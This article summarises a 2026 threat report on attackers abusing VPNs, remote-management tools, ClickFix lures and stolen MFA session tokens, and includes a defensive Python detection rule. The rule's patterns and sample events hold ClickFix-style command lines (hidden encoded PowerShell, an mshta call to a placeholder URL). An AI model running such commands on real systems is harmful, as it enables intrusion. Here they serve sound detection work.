The digital doorways organizations rely on every day – remote access points and trusted administrative tools – are increasingly becoming the entry points for cyberattacks, according to a recent threat report. The 2026 Annual Threat Report, released by Blackpoint Cyber, details a significant shift in attacker behavior, moving away from traditional vulnerability exploitation toward leveraging legitimate credentials and tools to gain access and move within networks.
This isn’t about sophisticated, zero-day exploits, but rather a calculated abuse of everyday workflows. Attackers are successfully blending into normal operations, making detection significantly more challenging. The report, informed by analysis of thousands of security investigations throughout 2025, highlights how threat actors are exploiting the inherent trust placed in remote access solutions and IT management platforms. This use of routine access as a pathway for modern intrusions demands a reevaluation of security strategies.
The findings reveal a concerning reliance on social engineering tactics, particularly deceptive campaigns that trick users into executing commands within their operating systems. These attacks, often bypassing traditional security measures, underscore the critical need for enhanced user awareness and robust endpoint protection. The report also points to the growing sophistication of cloud-based attacks, where attackers are reusing authenticated session tokens even with multi-factor authentication (MFA) in place.
The shift in tactics isn’t simply a change in *how* attackers gain access, but a change in *where* they’re focusing their efforts. Instead of spending resources on discovering and exploiting complex vulnerabilities, they’re capitalizing on the human element and the inherent trust organizations place in their own systems. This makes proactive defense – understanding normal behavior and identifying anomalies – more crucial than ever.
Attackers Favor Legitimate Access Over Exploits
The report’s analysis shows that attackers are more likely to log in using valid credentials than to exploit software vulnerabilities. SSL VPN abuse accounted for 32.8 percent of all identifiable incidents, making it a primary initial access vector. This often involves compromising credentials – through phishing or other means – and then using those credentials to establish legitimate-looking VPN sessions. Once inside, attackers can move laterally across the network with relative ease, often without triggering immediate alerts.
This isn’t to say that vulnerability exploitation is no longer a threat, but the report demonstrates a clear preference for leveraging existing access. It’s a more efficient and less risky approach for attackers, as it avoids the complexities and potential for detection associated with exploiting zero-day vulnerabilities.
Trusted Tools Become Weapons
Beyond VPNs, attackers are increasingly abusing legitimate Remote Monitoring and Management (RMM) tools. RMM abuse appeared in 30.3 percent of incidents, with ScreenConnect identified as being present in over 70 percent of rogue RMM cases. These tools, designed for IT administrators to remotely manage systems, can be incredibly powerful in the wrong hands. Because they often blend in with legitimate administrative activity, unauthorized installations and usage can be difficult to detect without strong visibility and monitoring.
The report emphasizes that organizations using multiple remote access tools are particularly vulnerable. The proliferation of these tools creates more opportunities for attackers to blend in and operate undetected. Maintaining a comprehensive inventory of approved RMM tools and promptly removing unused or legacy agents is a critical defensive measure.
Social Engineering Remains a Powerful Tactic
While legitimate access paths are becoming more common, user interaction remains a significant driver of incidents. Fake CAPTCHA and ClickFix-style campaigns accounted for 57.5 percent of all identifiable incidents. These campaigns rely on deceiving users into pasting commands into the Windows Run dialog, often disguised as a routine verification step. The commands, executed using built-in Windows tools, allow attackers to establish a foothold without downloading traditional malware.
This highlights the importance of user education and awareness training. Even with robust technical defenses, a single compromised user can provide an attacker with access to the entire network. Organizations need to empower their employees to recognize and report suspicious activity.
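Because the Run dialog is launched by explorer.exe, a command pasted there shows up as explorer.exe spawning a built-in tool with arguments an administrator rarely types by hand. The Python below is an added detection example, not code from the report or from Blackpoint Cyber: it scores constructed process-creation events on that parent/child pair plus a few command-line traits (hidden window, long encoded argument, remote URL, download-and-run cmdlets). The event field names, the scoring threshold and the sample hosts are assumptions; the base64 blob is a placeholder that decodes to repeated "A".

```python
import re

# Built-in Windows binaries that ClickFix-style lures have users launch from the Run dialog;
# the Run dialog's parent process is explorer.exe, which is what the rule keys on.
RUN_DIALOG_PARENT = "explorer.exe"
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "certutil.exe"}
# Command-line traits that rarely appear when an administrator opens a shell by hand.
SUSPICIOUS_ARGS = [
    ("hidden window", re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)),
    ("encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("remote URL", re.compile(r"https?://", re.I)),
    ("download-and-run cmdlet", re.compile(r"\biex\b|invoke-expression|downloadstring", re.I)),
]


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Score one process-creation event; explorer.exe spawning a LOLBin is required for any score."""
    if ev["parent_image"].lower() != RUN_DIALOG_PARENT or ev["image"].lower() not in LOLBINS:
        return 0, []
    reasons = ["lolbin spawned by explorer.exe"]
    for label, pattern in SUSPICIOUS_ARGS:
        if pattern.search(ev["command_line"]):
            reasons.append(label)
    return len(reasons), reasons


def detect(events: list[dict], threshold: int = 2) -> list[dict]:
    """Return events at or above the threshold; a bare shell launch (score 1) is ignored."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"host": ev["host"], "user": ev["user"], "score": score, "reasons": reasons})
    return hits


# Constructed sample events (hostnames, users and the base64 blob are made up; the blob is just 'AAAA...').
SAMPLE_EVENTS = [
    {"host": "ws-10", "user": "admin1", "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe"},  # admin opening a shell by hand: score 1, not reported
    {"host": "ws-11", "user": "jdoe", "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    {"host": "ws-12", "user": "msmith", "parent_image": "explorer.exe", "image": "mshta.exe",
     "command_line": "mshta.exe http://example.invalid/PLACEHOLDER.hta"},
    {"host": "srv-20", "user": "SYSTEM", "parent_image": "svchost.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -w hidden -File C:\\Scripts\\backup.ps1"},  # scheduled task, out of scope
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The parent-process requirement keeps scheduled tasks and other service-launched shells out of this rule; those need their own baseline rather than a lower threshold here.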
MFA Isn’t a Silver Bullet in the Cloud
The report also sheds light on the evolving tactics used in cloud-based attacks. While multi-factor authentication (MFA) is widely adopted, it’s not foolproof. Approximately 16 percent of cloud account disables documented in the report were the result of “adversary-in-the-middle” phishing attacks. In these scenarios, attackers capture authenticated session tokens *after* successful MFA and reuse them to access cloud services.
This demonstrates that MFA, while a crucial security measure, is not a complete solution. Attackers are finding ways to circumvent MFA by focusing on session hijacking rather than bypassing authentication altogether. Organizations need to implement additional security measures, such as Conditional Access policies that evaluate device posture, location, and session risk.
Defending Against the New Threat Landscape
The findings of the 2026 Annual Threat Report underscore the need for a proactive and layered security approach. Organizations must treat remote access as a high-risk activity, maintain a complete inventory of approved tools, and restrict unapproved software installations. Implementing Conditional Access controls and continuously monitoring for anomalous behavior are essential steps in mitigating the risk of these evolving threats.
Blackpoint Cyber will be hosting a live webinar to delve deeper into these findings and provide practical guidance on how to defend against these attacks. Registration for the webinar is now open, offering a valuable opportunity to learn from security experts and gain insights into the latest threat landscape.
The patterns documented in the report were observed across a range of sectors, including manufacturing, healthcare, managed service providers (MSPs), financial services, and construction, indicating a widespread vulnerability. As attackers continue to refine their tactics, organizations must prioritize proactive security measures and adapt their defenses to stay ahead of the curve.
Looking ahead, the focus for security teams will need to shift towards more granular visibility into network activity and a greater emphasis on behavioral analytics. Detecting anomalous behavior – even within legitimate workflows – will be critical in identifying and responding to these increasingly sophisticated attacks. The next step for many organizations will be a thorough review of their remote access policies and a reassessment of their overall security posture.
